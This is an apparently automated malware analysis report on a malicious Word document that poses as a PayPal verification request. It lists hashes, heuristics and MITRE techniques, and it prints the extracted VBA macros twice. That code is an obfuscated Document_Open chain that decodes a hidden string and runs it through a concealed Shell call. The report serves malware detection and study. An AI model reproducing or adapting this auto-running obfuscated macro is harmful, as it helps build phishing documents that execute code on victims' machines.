Office (OLE) malware analysis — malicious · 1cbb1afc45ea8a0e

MALICIOUS

Office (OLE)

47.5 KB Created: 2018-10-10 02:11:00 Authoring application: Microsoft Office Word First seen: 2019-02-10

MD5: 8506caad14eb3f2e2067aedaf5f81c26 SHA-1: 6c83a3be2696e05906757f6758234f1516f0e13f SHA-256: 1cbb1afc45ea8a0e39b3698b7f464e670b8896f544320ed33f19769cd5451470

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for malicious Office documents. The Document_Open macro utilizes a Shell() call, indicating an attempt to execute arbitrary code. The document body impersonates PayPal, requesting sensitive personal information under the guise of account verification, which is a phishing lure. No specific malware family could be identified.

Heuristics 5

ClamAV: Doc.Malware.Generic-6715186-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6715186-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2961 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2961 bytes
SHA-256: `483da09ffa1f3ce62a6e814f0113df77a0968786b9025f7b6805e296c5f855af`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() ac = "2" ac = "3" actually ac ac = "5" End Sub Attribute VB_Name = "filterException" Sub fputc(fileindex, cstdlib, ByRef GUI) GUI = Right(Left(fileindex, cstdlib), 1) End Sub Sub incf(ByRef data) data = data + 1 End Sub Sub Be(The, ByRef fpStackWalk64) fpStackWalk64 = "" MERCHANTABILITY = 1 WARRANTY MERCHANTABILITY, fpStackWalk64, The End Sub Sub WARRANTY(ByRef template, ByRef returnValue, clean) success = Len(clean) If template <= success Then ft = "" fputc clean, template, ft pt = 1 p ft, pt ut = "" ULONG64 pt - 2, ut returnValue = returnValue + ut template = template + 1 WARRANTY template, returnValue, clean End If End Sub Sub ULONG64(ContextRecord, ByRef context) context = "" If ContextRecord < 1 Then fputc shutdown.details, Len(shutdown.details) + ContextRecord, context Else fputc shutdown.details, ContextRecord, context End If End Sub Sub PCSTR(ByRef each0, ByRef SIGUSR1, try) If each0 < Len(shutdown.details) Then ft = "" fputc shutdown.details, each0, ft If try <> ft Then each0 = each0 + 1 PCSTR each0, SIGUSR1, try Else SIGUSR1 = each0 End If End If End Sub Sub p(try, ByRef SIGUSR1) each0 = 1 SIGUSR1 = 1 PCSTR each0, SIGUSR1, try End Sub Attribute VB_Name = "instances" Public Sub actually(analysis) shutdown.EXIT_FAILURE = analysis End Sub Attribute VB_Name = "shutdown" Attribute VB_Base = "0{4FCE4F8A-F0B3-4576-B882-B7854387FEB6}{3AFB2CD7-F646-43F3-AB0E-EE046835B48A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub try_Change() inline = 88 inline = 74 inline = 100 inline = 8 inline = 56 inline = 66 inline = 94 inline = 94 inline = 41 inline = 42 inline = 78 inline = 39 verbose = shutdown.try inline = 39 inline = 74 inline = 50 inline = 69 inline = 82 inline = 43 inline = 97 inline = 44 inline = 62 inline = 63 inline = 76 inline = 57 inline = 90 inline = 73 inline = 43 inline = 26 inline = 64 inline = 9 inline = 98 inline = 90 inline = 25 Shell verbose, 0 inline = 56 inline = 21 inline = 2 inline = 82 inline = 91 inline = 56 inline = 15 inline = 38 inline = 11 inline = 25 inline = 37 inline = 78 inline = 23 inline = 63 inline = 10 inline = 6 inline = 54 End Sub Private Sub EXIT_FAILURE_Change() terminate End Sub Attribute VB_Name = "sig" Public Sub terminate() fbe = "" Be shutdown.fler, fbe shutdown.pid_t = fbe shutdown.try = shutdown.pid_t End Sub

SHA-256: 483da09ffa1f3ce62a6e814f0113df77a0968786b9025f7b6805e296c5f855af

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
ac = "2"
ac = "3"
actually ac
ac = "5"
End Sub

Attribute VB_Name = "filterException"
Sub fputc(fileindex, cstdlib, ByRef GUI)
GUI = Right(Left(fileindex, cstdlib), 1)
End Sub

Sub incf(ByRef data)
data = data + 1
End Sub

Sub Be(The, ByRef fpStackWalk64)
fpStackWalk64 = ""
MERCHANTABILITY = 1
WARRANTY MERCHANTABILITY, fpStackWalk64, The
End Sub

Sub WARRANTY(ByRef template, ByRef returnValue, clean)
success = Len(clean)
If template <= success Then
ft = ""
fputc clean, template, ft
pt = 1
p ft, pt
ut = ""
ULONG64 pt - 2, ut
returnValue = returnValue + ut
template = template + 1
WARRANTY template, returnValue, clean
End If
End Sub

Sub ULONG64(ContextRecord, ByRef context)
context = ""
If ContextRecord < 1 Then
fputc shutdown.details, Len(shutdown.details) + ContextRecord, context
Else
fputc shutdown.details, ContextRecord, context
End If
End Sub

Sub PCSTR(ByRef each0, ByRef SIGUSR1, try)
If each0 < Len(shutdown.details) Then
    ft = ""
    fputc shutdown.details, each0, ft
    If try <> ft Then
    each0 = each0 + 1
    PCSTR each0, SIGUSR1, try
    Else
    SIGUSR1 = each0
    End If
End If
End Sub

Sub p(try, ByRef SIGUSR1)
each0 = 1
SIGUSR1 = 1
PCSTR each0, SIGUSR1, try
End Sub
  


Attribute VB_Name = "instances"
Public Sub actually(analysis)
shutdown.EXIT_FAILURE = analysis
End Sub

Attribute VB_Name = "shutdown"
Attribute VB_Base = "0{4FCE4F8A-F0B3-4576-B882-B7854387FEB6}{3AFB2CD7-F646-43F3-AB0E-EE046835B48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub try_Change()

inline = 88
inline = 74
inline = 100
inline = 8
inline = 56
inline = 66
inline = 94
inline = 94
inline = 41
inline = 42
inline = 78
inline = 39
verbose = shutdown.try
inline = 39
inline = 74
inline = 50
inline = 69
inline = 82
inline = 43
inline = 97
inline = 44
inline = 62
inline = 63
inline = 76
inline = 57
inline = 90
inline = 73
inline = 43
inline = 26
inline = 64
inline = 9
inline = 98
inline = 90
inline = 25
Shell verbose, 0
inline = 56
inline = 21
inline = 2
inline = 82
inline = 91
inline = 56
inline = 15
inline = 38
inline = 11
inline = 25
inline = 37
inline = 78
inline = 23
inline = 63
inline = 10
inline = 6
inline = 54
End Sub

Private Sub EXIT_FAILURE_Change()
terminate
End Sub

Attribute VB_Name = "sig"
Public Sub terminate()
fbe = ""
Be shutdown.fler, fbe
shutdown.pid_t = fbe
shutdown.try = shutdown.pid_t
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.